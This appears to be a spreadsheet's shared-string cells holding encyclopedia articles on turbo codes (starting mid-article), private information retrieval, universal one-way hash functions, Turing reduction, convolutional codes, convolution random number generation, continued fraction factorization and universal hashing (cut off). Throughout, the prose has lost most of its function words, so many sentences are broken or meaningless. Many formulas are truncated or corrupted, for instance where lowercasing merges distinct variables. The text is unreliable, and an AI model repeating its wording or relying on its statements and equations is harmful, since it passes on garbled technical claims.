\textstyle dec_{1}} yields soft decision causes {\displaystyle \textstyle l_{1}} delay. delay caused delay line encoder. {\displaystyle \textstyle dec_{2}} operation causes {\displaystyle \textstyle l_{2}} delay. interleaver installed decoders used scatter error bursts coming {\displaystyle \textstyle dec_{1}} output. block demultiplexing insertion module. works switch, redirecting input bits {\displaystyle \textstyle dec_{1}} moment {\displaystyle \textstyle dec_{2}} another. state, feeds {\displaystyle \textstyle y_{1k}} {\displaystyle \textstyle y_{2k}} inputs padding bits (zeros). consider memoryless awgn channel, assume k-th iteration, decoder receives pair random variables: {\displaystyle {\begin{aligned}~x_{k}&amp;=(2d_{k}-1)+a_{k}\\~y_{k}&amp;=2(y_{k}-1)+b_{k}\end{aligned}}} {\displaystyle \textstyle a_{k}} {\displaystyle \textstyle b_{k}} independent noise components variance {\displaystyle \textstyle \sigma ^{2}} {\displaystyle \textstyle y_{k}} k-th {\displaystyle \textstyle y_{k}} encoder output. redundant information demultiplexed sent {\displaystyle \textstyle dec_{1}} (when {\displaystyle \textstyle y_{k}=y_{1k}} {\displaystyle \textstyle dec_{2}} (when {\displaystyle \textstyle y_{k}=y_{2k}} {\displaystyle \textstyle dec_{1}} yields soft decision; i.e.: {\displaystyle \lambda (d_{k})=\log {\frac {p(d_{k}=1)}{p(d_{k}=0)}}} delivers {\displaystyle \textstyle dec_{2}} {\displaystyle \textstyle \lambda (d_{k})} called logarithm likelihood ratio (llr). {\displaystyle \textstyle p(d_{k}=i),\,i\in \{0,1\}} posteriori probability (app) {\displaystyle \textstyle d_{k}} data shows probability interpreting received {\displaystyle \textstyle d_{k}} {\displaystyle \textstyle taking account, {\displaystyle \textstyle dec_{2}} yields hard decision; i.e., decoded bit. known viterbi algorithm unable calculate app, thus cannot used {\displaystyle \textstyle dec_{1}} instead that, modified bcjr algorithm used. {\displaystyle \textstyle dec_{2}} viterbi algorithm appropriate one. however, depicted structure optimal one, {\displaystyle \textstyle dec_{1}} uses proper fraction available redundant information. order improve structure, feedback loop used (see dotted line figure). soft decision approach decoder front-end produces integer data stream. this integer measure likely also called soft bit. integer could drawn range [−127, 127], where: −127 means "certainly −100 means "very likely means could either means "very likely means "certainly 1"this introduces probabilistic aspect data-stream front end, conveys information example, bit, front traditional wireless-receiver decide internal analog voltage given threshold voltage level. turbo code decoder, front would provide integer measure internal voltage given threshold. decode n-bit block data, decoder front-end creates block likelihood measures, likelihood measure data stream. there parallel decoders, n⁄2-bit parity sub-blocks. both decoders sub-block likelihoods payload data. decoder working second parity sub-block knows permutation coder used sub-block. solving hypotheses find bits innovation turbo codes likelihood data reconcile differences decoders. each convolutional decoders generates hypothesis (with derived likelihoods) pattern bits payload sub-block. hypothesis bit-patterns compared, differ, decoders exchange derived likelihoods hypotheses. each decoder incorporates derived likelihood estimates decoder generate hypothesis bits payload. then compare hypotheses. this iterative process continues decoders come hypothesis m-bit pattern payload, typically cycles. analogy drawn process solving cross-reference puzzles like crossword sudoku. consider partially completed, possibly garbled crossword puzzle. puzzle solvers (decoders) trying solve possessing "down" clues (parity bits), possessing "across" clues. start, solvers guess answers (hypotheses) clues, noting confident letter (payload bit). then, compare notes, exchanging answers confidence ratings other, noticing differ. based knowledge, come updated answers confidence ratings, repeating whole process converge solution. performance turbo codes perform well attractive combination code's random appearance channel together physically realisable decoding structure. turbo codes affected error floor. practical applications using turbo codes telecommunications: turbo codes used extensively mobile telephony standards; e.g., hspa, ev-do lte. mediaflo, terrestrial mobile television system qualcomm. interaction channel satellite communication systems, dvb-rcs dvb-rcs2. recent nasa missions mars reconnaissance orbiter turbo codes alternative reed–solomon error correction-viterbi decoder codes. ieee 802.16 (wimax), wireless metropolitan network standard, uses block turbo coding convolutional turbo coding. bayesian formulation from artificial intelligence viewpoint, turbo codes considered instance loopy belief propagation bayesian networks. also convolutional code viterbi algorithm soft-decision decoding interleaver bcjr algorithm low-density parity-check code serial concatenated convolutional codes turbo equalizer forward error correction references further reading publications battail, gérard. conceptual framework understanding turbo codes." ieee journal selected areas communications 16.2 (1998): 245–254. brejza, matthew years turbo coding energy-aware design guidelines energy-constrained wireless applications." ieee communications surveys tutorials 18.1 (2016): 8–28. garzón-bohórquez, ronald, charbel abdel nour, catherine douillard. "improving turbo codes parity puncture-constrained interleavers." turbo codes iterative information processing (istc), 2016 international symposium ieee, 2016. external links "closing perfect code", ieee spectrum, march 2004 "the umts turbo code efficient decoder implementation suitable software-defined radios" (international journal wireless information networks) dana mackenzie (2005), "take limit", scientist, (2507): 38–41, issn 0262-4079. (preview, copy) "pushing limit", science news feature development genesis turbo codes international symposium turbo codes coded modulation library, open source library simulating turbo codes matlab "turbo equalization: principles results", ieee transactions communications article using convolutional codes jointly channel equalization. it++ home page it++ powerful library particular supports turbo codes turbo codes publications david mackay aff3ct home page fast forward error correction toolbox) high speed turbo codes simulations software turbo code sylvie kerouédan claude berrou (scholarpedia.org). 3gpp turbo reference design. estimate turbo code performance awgn (matlab). parallel concatenated convolutional coding: turbo codes (matlab simulink)</t>
  </si>
  <si>
    <t>Private information retrieval</t>
  </si>
  <si>
    <t>cryptography, private information retrieval (pir) protocol protocol allows user retrieve item server possession database without revealing item retrieved. weaker version 1-out-of-n oblivious transfer, also required user information database items. trivial, inefficient achieve server send entire copy database user. fact, possible protocol classical quantum setting) gives user information theoretic privacy query single-server setting. there ways address problem: make server computationally bounded assume multiple non-cooperating servers, copy database. problem introduced 1995 chor, goldreich, kushilevitz sudan information-theoretic setting 1997 kushilevitz ostrovsky computational setting. since then, efficient solutions discovered. single database (computationally private) achieved constant (amortized) communication k-database (information theoretic) done {\displaystyle n^{o\left({\frac {\log \log k}{k\log k}}\right)}} communication. advances computational first single-database computational scheme achieve communication complexity less {\displaystyle created 1997 kushilevitz ostrovsky achieved communication complexity {\displaystyle n^{\epsilon {\displaystyle \epsilon {\displaystyle number bits database. security scheme based well-studied quadratic residuosity problem. 1999, christian cachin, silvio micali markus stadler achieved poly-logarithmic communication complexity. security system based phi-hiding assumption. 2004, helger lipmaa achieved log-squared communication complexity {\displaystyle o(\ell \log n+k\log ^{2}n)} {\displaystyle \ell length strings {\displaystyle security parameter. security system reduces semantic security length-flexible additively homomorphic cryptosystem like damgård–jurik cryptosystem. 2005 craig gentry zulfikar ramzan achieved log-squared communication complexity retrieves log-square (consecutive) bits database. security scheme also based variant phi-hiding assumption. communication rate finally brought {\displaystyle aggelos kiayias, nikos leonardos, helger lipmaa, kateryna pavlyk, qiang tang, 2015.all previous sublinear-communication computational protocol required linear computational complexity {\displaystyle \omega (n)} public-key operations. 2009, helger lipmaa designed computational protocol communication complexity {\displaystyle o(\ell \log n+k\log ^{2}n)} worst-case computation {\displaystyle o(n/\log public-key operations. amortization techniques retrieve non-consecutive bits considered yuval ishai, eyal kushilevitz, rafail ostrovsky amit sahai.as shown ostrovsky skeith, schemes kushilevitz ostrovsky lipmaa similar ideas based homomorphic encryption. kushilevitz ostrovsky protocol based goldwasser–micali cryptosystem protocol lipmaa based damgård–jurik cryptosystem. advances information theoretic achieving information theoretic security requires assumption multiple non-cooperating servers, copy database. without assumption, information-theoretically secure protocol requires amount communication least size database multi-server protocols tolerant non-responsive malicious/colluding servers called robust byzantine robust respectively. these issues first considered beimel stahl (2002). ℓ-server system operate servers respond, servers respond incorrectly, withstand colluding servers without revealing client's query called "t-private ν-byzantine robust k-out-of-ℓ pir" [dgh 2012]. 2012, devet, goldberg, heninger (dgh 2012) proposed optimally robust scheme byzantine-robust {\displaystyle &lt;k-t-1} theoretical maximum value. based earlier protocol goldberg uses shamir's secret sharing hide query. goldberg released implementation sourceforge. relation cryptographic primitives one-way functions necessary, known sufficient, nontrivial (i.e., sublinear communication) single database computationally private information retrieval. fact, protocol proved giovanni crescenzo, malkin rafail ostrovsky imply oblivious transfer (see below).oblivious transfer, also called symmetric pir, additional restriction user learn item requested. termed symmetric user database privacy requirement. collision-resistant cryptographic hash functions implied one-round computational scheme, shown ishai, kushilevitz ostrovsky. variations basic motivation private information retrieval family two-party protocols parties (the sender) owns database, part (the receiver) wants query certain privacy restrictions warranties. result protocol, receiver wants i-th value database must learn i-th entry, sender must learn nothing general protocol, computationally unbounded sender learn nothing privacy theoretically preserved. since problem posed, different approaches solution pursued variations proposed. cpir (computationally private information retrieval) protocol similar protocol: receiver retrieves element chosen sender's database, sender obtains knowledge element transferred. difference privacy safeguarded polynomially bounded sender.a cspir (computationally symmetric private information retrieval) protocol used similar scenario cpir protocol used. sender owns database, receiver wants i-th value database, execution spir protocol, receiver learned nothing values database i-th one. implementations numerous computational information theoretic schemes literature implemented. here incomplete list: muchpir cpir implementation postgres c/c++ extension [github, 2021]. sealpir fast cpir implementation [acls 2018]. popcorn implementation tailored media [gcmsaw 2016]. percy++ includes implementations 2007, 2012, cgks 1998, goldberg 2007, 2011, 2015]. raid-pir implementation itpir scheme [dhs 2014]. xpir fast cpir implementation [abfk 2014]. uppir itpir implementation [cappos 2013]. notes also k-anonymity locally decodable code references external links helger lipmaa's links oblivious transfer william gasarch's website including survey articles rafail ostrovsky's website contaiting articles surveys</t>
  </si>
  <si>
    <t>Universal one-way hash function</t>
  </si>
  <si>
    <t>cryptography universal one-way hash function (uowhf, often pronounced "woof"), type universal hash function particular importance cryptography. uowhf's proposed alternative collision-resistant hash functions (crhfs). crhfs strong collision-resistance property: hard, given randomly chosen hash function parameters, find collision hash function. contrast, uowhfs require hard find collision preimage chosen independently hash function parameters. primitive suggested moni naor moti yung also known "target collision resistant" hash functions; employed construct general digital signature schemes without trapdoor functions, also within chosen-ciphertext secure public encryption schemes. uowhf family contains finite number hash functions probability used. definition security property uowhf follows. {\displaystyle algorithm operates phases: initially, {\displaystyle receives input (or, security parameter) chooses value {\displaystyle hash function {\displaystyle chosen randomly family. {\displaystyle receives {\displaystyle must output {\displaystyle y\neq {\displaystyle h(x)=h(y)} .then polynomial-time {\displaystyle probability {\displaystyle succeeds negligible. applications uowhfs thought less computationally expensive crhfs, often used efficiency purposes schemes choice hash function happens stage execution, rather beforehand. instance, cramer–shoup cryptosystem uses uowhf part validity check ciphertexts. also preimage attack further reading goldreich, oded (2004). foundations cryptography. vol. cambridge university press. external links moni naor moti yung, "universal one-way hash functions cryptographic applications", 1989.</t>
  </si>
  <si>
    <t>Turing reduction</t>
  </si>
  <si>
    <t>computability theory, turing reduction decision problem {\displaystyle decision problem {\displaystyle oracle machine decides problem {\displaystyle given oracle {\displaystyle (rogers 1967, soare 1987). understood algorithm could used solve {\displaystyle available subroutine solving concept analogously applied function problems. turing reduction {\displaystyle {\displaystyle exists, every algorithm {\displaystyle used produce algorithm {\displaystyle inserting algorithm {\displaystyle place oracle machine computing {\displaystyle queries oracle {\displaystyle however, oracle machine query oracle large number times, resulting algorithm require time asymptotically either algorithm {\displaystyle oracle machine computing {\displaystyle turing reduction oracle machine runs polynomial time known cook reduction. first formal definition relative computability, called relative reducibility, given alan turing 1939 terms oracle machines. later 1943 1952 stephen kleene defined equivalent concept terms recursive functions. 1944 emil post used term "turing reducibility" refer concept. definition given sets {\displaystyle a,b\subseteq \mathbb natural numbers, {\displaystyle turing reducible {\displaystyle write {\displaystyle a\leq _{t}b} oracle machine computes characteristic function oracle case, also b-recursive b-computable. oracle machine that, oracle computes partial function domain said b-recursively enumerable b-computably enumerable. {\displaystyle turing equivalent {\displaystyle write {\displaystyle a\equiv _{t}b\,} {\displaystyle a\leq _{t}b} {\displaystyle b\leq _{t}a.} equivalence classes turing equivalent sets called turing degrees. turing degree {\displaystyle written {\displaystyle {\textbf {deg}}(x)} given {\displaystyle {\mathcal {x}}\subseteq {\mathcal {p}}(\mathbb {\displaystyle a\subseteq \mathbb called turing hard {\displaystyle {\mathcal {x}}} {\displaystyle x\leq _{t}a} {\displaystyle x\in {\mathcal {x}}} additionally {\displaystyle a\in {\mathcal {x}}} {\displaystyle called turing complete {\displaystyle {\mathcal {x}}} relation turing completeness computational universality turing completeness, defined above, corresponds partially turing completeness sense computational universality. specifically, turing machine universal turing machine halting problem (i.e., inputs eventually halts) many-one complete. thus, necessary insufficient condition machine computationally universal, machine's halting problem turing-complete {\displaystyle {\mathcal {x}}} recursively enumerable sets. insufficient still case that, language accepted machine recursively enumerable. example {\displaystyle w_{e}} denote input values turing machine index halts. then sets {\displaystyle a=\{e\mid e\in w_{e}\}} {\displaystyle b=\{(e,n)\mid n\in w_{e}\}} turing equivalent (here {\displaystyle (-,-)} denotes effective pairing function). reduction showing {\displaystyle a\leq _{t}b} constructed using fact {\displaystyle e\in a\leftrightarrow (e,e)\in given pair {\displaystyle (e,n)} index {\displaystyle i(e,n)} constructed using theorem program coded {\displaystyle i(e,n)} ignores input merely simulates computation machine index input particular, machine index {\displaystyle i(e,n)} either halts every input halts input. thus {\displaystyle i(e,n)\in a\leftrightarrow (e,n)\in holds because function computable, shows {\displaystyle b\leq _{t}a} reductions presented turing reductions many-one reductions, discussed below. properties every turing equivalent complement. every computable turing reducible every set. because computable computed oracle, computed oracle machine ignores given oracle. relation {\displaystyle \leq _{t}} transitive: {\displaystyle a\leq _{t}b} {\displaystyle b\leq _{t}c} {\displaystyle a\leq _{t}c} moreover, {\displaystyle a\leq _{t}a} holds every thus relation {\displaystyle \leq _{t}} preorder partial order {\displaystyle a\leq _{t}b} {\displaystyle b\leq _{t}a} necessarily imply {\displaystyle a=b} there pairs sets {\displaystyle (a,b)} turing reducible turing reducible thus {\displaystyle \leq _{t}} total order. there infinite decreasing sequences sets {\displaystyle \leq _{t}} thus relation well-founded. every turing reducible turing jump, turing jump never turing reducible original set. reduction since every reduction {\displaystyle {\displaystyle determine whether single element {\displaystyle finitely many steps, make finitely many queries membership {\displaystyle when amount information {\displaystyle used compute single {\displaystyle discussed, made precise function. formally, reduction function sends natural number {\displaystyle largest natural number {\displaystyle whose membership queried reduction determining membership {\displaystyle {\displaystyle stronger reductions there common ways producing reductions stronger turing reducibility. first limit number manner oracle queries. {\displaystyle many-one reducible {\displaystyle total computable function {\displaystyle element {\displaystyle {\displaystyle {\displaystyle f(n)} {\displaystyle such function used generate turing reduction computing {\displaystyle f(n)} querying oracle, interpreting result). truth table reduction weak truth table reduction must present oracle queries time. truth table reduction, reduction also gives boolean function truth table) which, given answers queries, produce final answer reduction. weak truth table reduction, reduction uses oracle answers basis computation depending given answers (but using oracle). equivalently, weak truth table reduction reduction bounded computable function. reason, weak truth table reductions sometimes called "bounded turing" reductions.the second produce stronger reducibility notion limit computational resources program implementing turing reduction use. these limits computational complexity reduction important studying subrecursive classes polynomial-time reducible {\displaystyle turing reduction {\displaystyle {\displaystyle runs polynomial time. concept log-space reduction similar. these reductions stronger sense provide finer distinction equivalence classes, satisfy restrictive requirements turing reductions. consequently, reductions harder find. there build many-one reduction another even turing reduction sets exists. weaker reductions according church–turing thesis, turing reduction general form effectively calculable reduction. nevertheless, weaker reductions also considered. {\displaystyle said arithmetical {\displaystyle {\displaystyle definable formula peano arithmetic {\displaystyle parameter. {\displaystyle hyperarithmetical {\displaystyle recursive ordinal {\displaystyle \alpha {\displaystyle computable {\displaystyle b^{(\alpha α-iterated turing jump {\displaystyle notion relative constructibility important reducibility notion theory. also karp reduction notes references davis, ed., 1965. undecidable—basic papers undecidable propositions, unsolvable problems computable functions, raven, york. reprint, dover, 2004. isbn 0-486-43228-9. kleene, 1952. introduction metamathematics. amsterdam: north-holland. kleene post, 1954. "the upper semi-lattice degrees recursive unsolvability". annals mathematics 379–407. post, (1944). "recursively enumerable sets positive integers decision problems" (pdf). bulletin american mathematical society. 284–316. doi:10.1090/s0002-9904-1944-08111-1. retrieved 2015-12-17. turing, 1939. "systems logic based ordinals." proceedings london mathematics society, ser. 161–228. reprinted "the undecidable", davis ed., 1965. rogers, 1967. theory recursive functions effective computability. mcgraw-hill. soare, 1987. recursively enumerable sets degrees, springer. davis, martin (november 2006). "what is...turing reducibility?" (pdf). notices american mathematical society. (10): 1218–1219. retrieved 2008-01-16. external links nist dictionary algorithms data structures: turing reduction university cambridge, andrew pitts, tobias kohn: computational theory prof. jean gallier’s homepage</t>
  </si>
  <si>
    <t>Convolutional code</t>
  </si>
  <si>
    <t>telecommunication, convolutional code type error-correcting code generates parity symbols sliding application boolean polynomial function data stream. sliding application represents 'convolution' encoder data, gives rise term 'convolutional coding'. sliding nature convolutional codes facilitates trellis decoding using time-invariant trellis. time invariant trellis decoding allows convolutional codes maximum-likelihood soft-decision decoded reasonable complexity. ability perform economical maximum likelihood soft decision decoding major benefits convolutional codes. this contrast classic block codes, generally represented time-variant trellis therefore typically hard-decision decoded. convolutional codes often characterized base code rate depth memory) encoder {\displaystyle [n,k,k]} base code rate typically given {\displaystyle n/k} input data rate data rate output channel encoded stream. less channel coding inserts redundancy input bits. memory often called "constraint length" output function current input well previous {\displaystyle k-1} inputs. depth also given number memory elements polynomial maximum possible number states encoder (typically {\displaystyle 2^{v}} convolutional codes often described continuous. however, also said convolutional codes arbitrary block length, rather continuous, since real-world convolutional encoding performed blocks data. convolutionally encoded block codes typically employ termination. arbitrary block length convolutional codes also contrasted classic block codes, generally fixed block lengths determined algebraic properties. code rate convolutional code commonly modified symbol puncturing. example, convolutional code 'mother' code rate {\displaystyle n/k=1/2} punctured higher rate example, {\displaystyle 7/8} simply transmitting portion code symbols. performance punctured convolutional code generally scales well amount parity transmitted. ability perform economical soft decision decoding convolutional codes, well block length code rate flexibility convolutional codes, makes popular digital communications. history convolutional codes introduced 1955 peter elias. thought convolutional codes could decoded arbitrary quality expense computation delay. 1967, andrew viterbi determined convolutional codes could maximum-likelihood decoded reasonable complexity using time invariant trellis based decoders viterbi algorithm. other trellis-based decoder algorithms later developed, including bcjr decoding algorithm. recursive systematic convolutional codes invented claude berrou around 1991. these codes proved especially useful iterative processing including processing concatenated codes turbo codes.using "convolutional" terminology, classic convolutional code might considered finite impulse response (fir) filter, recursive convolutional code might considered infinite impulse response (iir) filter. where convolutional codes used convolutional codes used extensively achieve reliable data transfer numerous applications, digital video, radio, mobile communications (e.g., gsm, gprs, edge networks (until 3gpp release satellite communications. these codes often implemented concatenation hard-decision code, particularly reed–solomon. prior turbo codes constructions efficient, coming closest shannon limit. convolutional encoding convolutionally encode data, start memory registers, holding input bit. unless otherwise specified, memory registers start value encoder modulo-2 adders modulo adder implemented single boolean gate, logic generator polynomials adder (see figure below). input leftmost register. using generator polynomials existing values remaining registers, encoder outputs symbols. these symbols transmitted punctured depending desired code rate. shift register values right moves moves m−1) wait next input bit. remaining input bits, encoder continues shifting registers returned zero state (flush termination). figure rate (m⁄n) encoder constraint length generator polynomials (1,1,1), (0,1,1), (1,0,1). therefore, output bits calculated (modulo follows: m−1.convolutional codes systematic non-systematic: systematic repeats structure message encoding non-systematic changes initial structurenon-systematic convolutional codes popular better noise immunity. relates free distance convolutional code. recursive non-recursive codes encoder picture non-recursive encoder. here's example recursive admits feedback structure: example encoder systematic input data also used output symbols (output codes output symbols include input data called non-systematic. recursive codes typically systematic and, conversely, non-recursive codes typically non-systematic. strict requirement, common practice. example encoder img. 8-state encoder registers create possible encoder states (23). corresponding decoder trellis typically states well. recursive systematic convolutional (rsc) codes become popular turbo codes. recursive systematic codes also referred pseudo-systematic codes. other codes example applications include: useful ldpc code implementation inner constituent code serial concatenated convolutional codes (sccc's). useful sccc's multidimensional turbo codes. useful constituent code error rate turbo codes applications satellite links. also suitable sccc outer code. impulse response, transfer function, constraint length convolutional encoder called performs convolution input stream encoder's impulse responses: {\displaystyle y_{i}^{j}=\sum _{k=0}^{\infty }h_{k}^{j}x_{i-k}=(x*h^{j})[i],} input sequence, sequence output impulse response output {\displaystyle {*}} denotes convolution. convolutional encoder discrete linear time-invariant system. every output encoder described transfer function, closely related generator polynomial. impulse response connected transfer function z-transform. transfer functions first (non-recursive) encoder are: {\displaystyle h_{1}(z)=1+z^{-1}+z^{-2},\,} {\displaystyle h_{2}(z)=z^{-1}+z^{-2},\,} {\displaystyle h_{3}(z)=1+z^{-2}.\,} transfer functions second (recursive) encoder are: {\displaystyle h_{1}(z)={\frac {1+z^{-1}+z^{-3}}{1-z^{-2}-z^{-3}}},\,} {\displaystyle h_{2}(z)=1.\,} define polydeg {\displaystyle m=\max _{i}\operatorname {polydeg} (h_{i}(1/z))\,} where, rational function {\displaystyle f(z)=p(z)/q(z)\,} polydeg {\displaystyle \operatorname {polydeg} (f)=\max(\deg(p),\deg(q))\,} .then maximum polynomial degrees {\displaystyle h_{i}(1/z)\,} constraint length defined {\displaystyle k=m+1\,} instance, first example constraint length second constraint length trellis diagram convolutional encoder finite state machine. encoder binary cells states. imagine encoder (shown img.1, above) left memory cell (m0), right (m−1). really memory cell represents current value). designate state "10". according input encoder next turn convert either "01" state "11" state. transitions possible (e.g., decoder can't convert "10" state "00" even stay "10" state). possible transitions shown below: actual encoded sequence represented path graph. valid path shown example. this diagram gives idea decoding: received sequence graph, received errors, must choose nearest correct (fitting graph) sequence. real decoding algorithms exploit idea. free distance error distribution free distance minimal hamming distance different encoded sequences. correcting capability convolutional code number errors corrected code. calculated {\displaystyle t=\left\lfloor {\frac {d-1}{2}}\right\rfloor since convolutional code blocks, processing instead continuous bitstream, value applies quantity errors located relatively near other. that multiple groups errors usually fixed relatively apart. free distance interpreted minimal length erroneous "burst" output convolutional decoder. fact errors appear "bursts" accounted designing concatenated code inner convolutional code. popular solution problem interleave data convolutional encoding, outer block (usually reed–solomon) code correct errors. decoding convolutional codes several algorithms exist decoding convolutional codes. relatively small values viterbi algorithm universally used provides maximum likelihood performance highly parallelizable. viterbi decoders thus easy implement vlsi hardware software cpus simd instruction sets. longer constraint length codes practically decoded several sequential decoding algorithms, fano algorithm best known. unlike viterbi decoding, sequential decoding maximum likelihood complexity increases slightly constraint length, allowing strong, long-constraint-length codes. such codes used pioneer program early 1970s jupiter saturn, gave shorter, viterbi-decoded codes, usually concatenated large reed–solomon error correction codes steepen overall bit-error-rate curve produce extremely residual undetected error rates. both viterbi sequential decoding algorithms return hard decisions: bits form likely codeword. approximate confidence measure added soft output viterbi algorithm. maximum posteriori (map) soft decisions obtained bcjr algorithm. popular convolutional codes fact, predefined convolutional codes structures obtained scientific researches used industry. this relates possibility select catastrophic convolutional codes (causes larger number errors). especially popular viterbi-decoded convolutional code, used least since voyager program constraint length rate 1/2.mars pathfinder, mars exploration rover cassini probe saturn rate 1/6; code performs better simpler {\displaystyle k=7} code cost 256× decoding complexity (compared voyager mission codes). convolutional code constraint length rate used error correction technique. punctured convolutional codes convolutional code code rate designed based polynomial selection; however, practice, puncturing procedure often used achieve required code rate. puncturing technique used make rate code "basic" low-rate (e.g., 1/n) code. achieved deleting bits encoder output. bits deleted according puncturing matrix. following puncturing matrices frequently used: example, want make code rate using appropriate matrix table, take basic encoder output transmit every first first branch every second one. specific order transmission defined respective communication standard. punctured convolutional codes widely used satellite communications, example, intelsat systems digital video broadcasting. punctured convolutional codes also called "perforated". turbo codes: replacing convolutional codes simple viterbi-decoded convolutional codes giving turbo codes, class iterated short convolutional codes closely approach theoretical limits imposed shannon's theorem much less decoding complexity viterbi algorithm long convolutional codes would required performance. concatenation outer algebraic code (e.g., reed–solomon) addresses issue error floors inherent turbo code designs. also quantum convolutional code references this article incorporates public domain material general services administration document: "federal standard 1037c". external links on-line textbook: information theory, inference, learning algorithms, david j.c. mackay, discusses convolutional codes chapter error correcting codes (ecc) page matlab explanations fundamentals convolutional decoders better digital communications convolutional codes (mit) information theory coding ilmenau), discusses convolutional codes page further reading</t>
  </si>
  <si>
    <t>Convolution random number generator</t>
  </si>
  <si>
    <t>statistics computer software, convolution random number generator pseudo-random number sampling method used generate random variates certain classes probability distribution. particular advantage type approach allows advantage taken existing software generating random variates other, usually non-uniform, distributions. however, faster algorithms obtainable distributions complicated approaches. number distributions expressed terms (possibly weighted) random variables distributions. (the distribution convolution distributions individual random variables). example consider problem generating random variable erlang distribution, erlang {\displaystyle \sim \operatorname {erlang} (k,\theta such random variable defined random variables exponential distribution {\displaystyle \operatorname {exp} (k\theta )\,} this problem equivalent generating random number special case gamma distribution, shape parameter takes integer value. notice that: {\displaystyle \operatorname [x]={\frac {1}{k\theta }}+{\frac {1}{k\theta }}+\cdots +{\frac {1}{k\theta }}={\frac {1}{\theta }}.} generate erlang {\displaystyle \operatorname {erlang} (k,\theta samples using random number generator exponential distribution: {\displaystyle x_{i}\ \sim \operatorname {exp} (k\theta erlang {\displaystyle x=\sum _{i=1}^{k}x_{i}\sim \operatorname {erlang} (k,\theta</t>
  </si>
  <si>
    <t>Continued fraction factorization</t>
  </si>
  <si>
    <t>number theory, continued fraction factorization method (cfrac) integer factorization algorithm. general-purpose algorithm, meaning suitable factoring integer depending special form properties. described lehmer powers 1931, developed computer algorithm michael morrison john brillhart 1975.the continued fraction method based dixon's factorization method. uses convergents regular continued fraction expansion {\displaystyle {\sqrt {kn}},\qquad k\in \mathbb {z^{+}} .since quadratic irrational, continued fraction must periodic (unless square, case factorization obvious). time complexity {\displaystyle o\left(e^{\sqrt {2\log n\log \log n}}\right)=l_{n}\left[1/2,{\sqrt {2}}\right]} notations. references further reading samuel wagstaff, (2013). factoring. providence, american mathematical society. 143–171. isbn 978-1-4704-1048-3.</t>
  </si>
  <si>
    <t>Universal hashing</t>
  </si>
  <si>
    <t>mathematics computing, universal hashing randomized algorithm data structure) refers selecting hash function random family hash functions certain mathematical property (see definition below). this guarantees number collisions expectation, even data chosen adversary. many universal families known (for hashing integers, vectors, strings), evaluation often efficient. universal hashing numerous uses computer science, example implementations hash tables, randomized algorithms, cryptography. introduction assume want keys universe {\displaystyle {\displaystyle bins (labelled {\displaystyle [m]=\{0,\dots ,m-1\}} algorithm handle data {\displaystyle s\subseteq {\displaystyle |s|=n} keys, known advance. usually, goal hashing obtain number collisions (keys {\displaystyle land bin). deterministic hash function cannot offer guarantee adversarial setting {\displaystyle |u|&gt;m\cdot since adversary choose {\displaystyle precisely preimage bin. this means data keys land bin, making hashing useless. furthermore, deterministic hash function allow rehashing: sometimes input data turns hash function (e.g. many collisions), would like change hash function. solution problems pick function randomly family hash functions. family functions {\displaystyle h=\{h:u\to [m]\}} called universal family {\displaystyle \forall x,y\in u,~x\neq y:~~\pr _{h\in h}[h(x)=h(y)]\leq {\frac {1}{m}}} words, keys universe collide probability {\displaystyle 1/m} hash function {\displaystyle drawn randomly {\displaystyle this exactly probability collision would expect hash function assigned truly random hash codes every key. sometimes, definition relaxed allow collision probability {\displaystyle o(1/m)} this concept introduced carter wegman 1977, found numerous applications computer science (see, example). upper bound {\displaystyle \epsilon collision probability, {\displaystyle \epsilon -almost universality. many, all, universal families following stronger uniform difference property: {\displaystyle \forall x,y\in u,~x\neq {\displaystyle drawn randomly family {\displaystyle difference {\displaystyle h(x)-h(y)~{\bmod {~}}m} uniformly distributed {\displaystyle [m]} .note definition universality concerned whether {\displaystyle h(x)-h(y)=0} counts collisions. uniform difference property stronger. (similarly, universal family universal {\displaystyle \forall x,y\in u,~x\neq value {\displaystyle h(x)\oplus h(y)~{\bmod {~}}m} uniformly distributed {\displaystyle [m]} {\displaystyle \oplus bitwise exclusive operation. this possible {\displaystyle power two.) even stronger condition pairwise independence: property {\displaystyle \forall x,y\in u,~x\neq probability {\displaystyle x,y} hash pair hash values {\displaystyle z_{1},z_{2}} perfectly random: {\displaystyle p(h(x)=z_{1}\land h(y)=z_{2})=1/m^{2}} pairwise independence sometimes called strong universality. another property uniformity. family uniform hash values equally likely: {\displaystyle p(h(x)=z)=1/m} hash value {\displaystyle universality imply uniformity. however, strong universality imply uniformity. given family uniform distance property, produce pairwise independent strongly universal hash family adding uniformly distributed random constant values {\displaystyle [m]} hash functions. (similarly, {\displaystyle power two, achieve pairwise independence universal hash family exclusive uniformly distributed random constant.) since shift constant sometimes irrelevant applications (e.g. hash tables), careful distinction uniform distance property pairwise independent sometimes made.for applications (such hash tables), important least significant bits hash values also universal. when family strongly universal, guaranteed: {\displaystyle strongly universal family {\displaystyle m=2^{l}} family made functions {\displaystyle h{\bmod {2^{l'}}}} {\displaystyle h\in also strongly universal {\displaystyle l'\leq unfortunately, true (merely) universal families. example, family made identity function {\displaystyle h(x)=x} clearly universal, family made function {\displaystyle h(x)=x{\bmod {2^{l'}}}} fails universal. umac poly1305-aes several message authentication code algorithms based universal hashing. applications, software chooses hash function every message, based unique nonce message. several hash table implementations based universal hashing. applications, typically software chooses hash function notices "too many" keys collided; then, hash function continues used over. (some collision resolution schemes, dynamic perfect hashing, pick hash function every time collision. other collision resolution schemes, cuckoo hashing 2-choice hashing, allow number collisions picking hash function). survey fastest known universal strongly universal hash functions integers, vectors, strings found mathematical guarantees fixed {\displaystyle {\displaystyle keys, using universal family guarantees following properties. fixed {\displaystyle {\displaystyle expected number keys {\displaystyle h(x)} {\displaystyle n/m} when implementing hash tables chaining, number proportional expected running time operation involving {\displaystyle (for example query, insertion deletion). expected number pairs keys {\displaystyle x,y} {\displaystyle {\displaystyle x\neq collide {\displaystyle h(x)=h(y)} bounded {\displaystyle n(n-1)/2m} order {\displaystyle o(n^{2}/m)} when number bins, {\displaystyle chosen linear {\displaystyle (i.e., determined function {\displaystyle \omega (n)} expected number collisions {\displaystyle o(n)} when hashing {\displaystyle n^{2}} bins, collisions probability least half. expected number keys bins least {\displaystyle keys bounded {\displaystyle 2n/(t-2(n/m)+1)} thus, capacity capped three times average size {\displaystyle t=3n/m} total number keys overflowing bins {\displaystyle o(m)} this holds hash family whose collision probability bounded {\displaystyle 1/m} weaker definition used, bounding {\displaystyle o(1/m)} result longer true.as guarantees hold fixed {\displaystyle hold data chosen adversary. however, adversary make choice independent algorithm's random choice hash function. adversary observe random choice algorithm, randomness serves purpose, situation deterministic hashing. second third guarantee typically used conjunction rehashing. instance, randomized algorithm prepared handle {\displaystyle 